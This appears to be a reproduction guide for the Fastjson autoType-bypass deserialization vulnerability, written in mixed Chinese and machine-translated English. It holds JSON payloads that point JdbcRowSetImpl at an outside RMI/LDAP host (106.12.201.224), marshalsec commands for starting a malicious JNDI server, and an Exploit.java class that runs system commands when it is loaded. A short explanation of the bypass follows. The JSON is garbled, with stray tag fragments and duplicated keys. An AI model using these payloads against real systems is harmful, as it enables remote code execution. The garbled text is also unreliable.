Reference links:
https://paper.seebug.org/994/
https://www.cnblogs.com/jinqi520/p/11097779.html
https://xz.aliyun.com/t/5680
0x01 reproducible vulnerability RMi
1. payload:
{"@type":"java.lang.Class",
br/>"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl""@type":"com.sun.rowset.JdbcRowSetImpl",
br/>},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://106.12.201.224:1099/Exploit",
"autoCommit":true
}
}
2. 在×××上执行,启动一个rmi服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://106.12.201.224/#Exploit"
- 生成编译***脚本
将下面代码保存为:Exploit.java
然后执行:javac Exploit.java,生成class文件
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}0x02 漏洞复现 LDAP
1. payload:
{"@type":"java.lang.Class",
br/>"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl""@type":"com.sun.rowset.JdbcRowSetImpl",
br/>},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://106.12.201.224:1389/Exploit",
"autoCommit":true
}
}
2. On ××× execution, a rmi service starts
the Java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer " http://106.12.201.224/#Exploit "
- *** A compiled script
Exploit.java Do not import the package
Save the following code: Exploit.java
then execute: javac Exploit.java, generate class files
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}0x03 vulnerability principle
The general idea is bypassed by java.lang.Class, the class is loaded into JdbcRowSetImpl map cache, thereby bypassing autotype detection. So send the payload twice, first load, the second performance. By default, as long as the experience is not loaded into the cache of class, checkautotype will throw an exception and abort.
When sending the first request, by Class deserializers.findClass loaded, then the Class class JdbcRowSetImpl loaded into the map, and then a second request, here successfully found JdbcRowSetImpl class, bypassing the detection.